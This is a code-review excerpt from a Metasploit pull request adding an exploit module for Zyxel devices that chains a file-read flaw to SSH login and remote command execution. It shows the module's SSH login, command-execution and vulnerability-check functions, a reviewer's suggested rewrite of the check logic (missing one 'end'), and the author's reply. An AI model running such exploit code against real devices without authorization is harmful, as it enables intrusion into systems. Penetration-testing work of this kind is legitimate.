modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb

```diff
@@ -0,0 +1,305 @@
+    return hash_pwd
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status("Executing #{cmd}")
+    begin
+      Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }
+    rescue Timeout::Error
+      # print_warning('Timed out while waiting for command to return')
+      @timeout = true
+    end
+  end
+
+  def do_login(ip, user, pass, ssh_port)
+    # create SSH session and login
+    # if login is successfull, return true else return false. All other errors will trigger an immediate fail
+    opts = ssh_client_defaults.merge({
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: ssh_port,
+      password: pass
+    })
+
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        self.ssh_socket = Net::SSH.start(ip, user, opts)
+      end
+    rescue Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
+    rescue Net::SSH::Disconnect, ::EOFError
+      fail_with(Failure::Disconnected, 'Timed out during negotiation')
+    rescue Net::SSH::AuthenticationFailed
+      return false
+    rescue Net::SSH::Exception => e
+      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
+    end
+
+    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
+    return true
+  end
+
+  def check_port(port)
+    # checks network port and return true if open and false if closed.
+    (sleep datastore['WfsDelay']) until begin
+      TCPSocket.open(datastore['RHOST'], port)
+    rescue StandardError
+      return false
+    end
+    return true
+  end
+
+  def check
+    res = get_configuration
+    return CheckCode::Safe if res.nil? || res.code != 200
+
+    config = process_configuration(res)
+
+    # check if all hash key/value pairs are populated
+    print_status("hardware: #{config['hardware']} software: #{config['software']} serial: #{config['serial']}")
+    print_status("ssh_user: #{config['ssh_user']} ssh_port: #{config['ssh_port']} ssh_wan_access: #{config['ssh_wan_access']} ssh_service_enabled: #{config['ssh_service_enabled']}")
+    if config['serial'].nil? || config['ssh_user'].nil? || config['ssh_port'].nil? || config['ssh_wan_access'].nil? || config['ssh_service_enabled'].nil?
+      return CheckCode::Unknown('Device serial, supervisor user, SSH port, or SSH WAN access/service status not found.')
+    end
+
+    # check if ssh_port is open, ssh service is enabled and accessible from the WAN side
+    if config['ssh_wan_access'] == 'LAN_WAN' && config['ssh_service_enabled'] && check_port(config['ssh_port'])
+      return CheckCode::Vulnerable
+    elsif !config['ssh_service_enabled']
+      return CheckCode::Safe('SSH service is NOT available.')
+    else
+      return CheckCode::Detected("WAN access to SSH service is NOT allowed or SSH port #{config['ssh_port']} is closed. Try exploit from the LAN side.")
+    end
```

Comment:
```suggestion
    if config['ssh_service_enabled']
      if config['ssh_wan_access'] == 'LAN_WAN' && check_port(config['ssh_port'])
        return CheckCode::Vulnerable
      else
         return CheckCode::Detected("WAN access to SSH service is NOT allowed or SSH port #{config['ssh_port']} is closed. Try exploit from the LAN side.")
    else
      return CheckCode::Safe('SSH service is NOT available.')
    end
```

Reply:
Yeah, this is better. Updated ! See https://github.com/rapid7/metasploit-framework/pull/17881/commits/de9cd59ea5bd3348a4dcdc6eb0f0c398cd89d9a7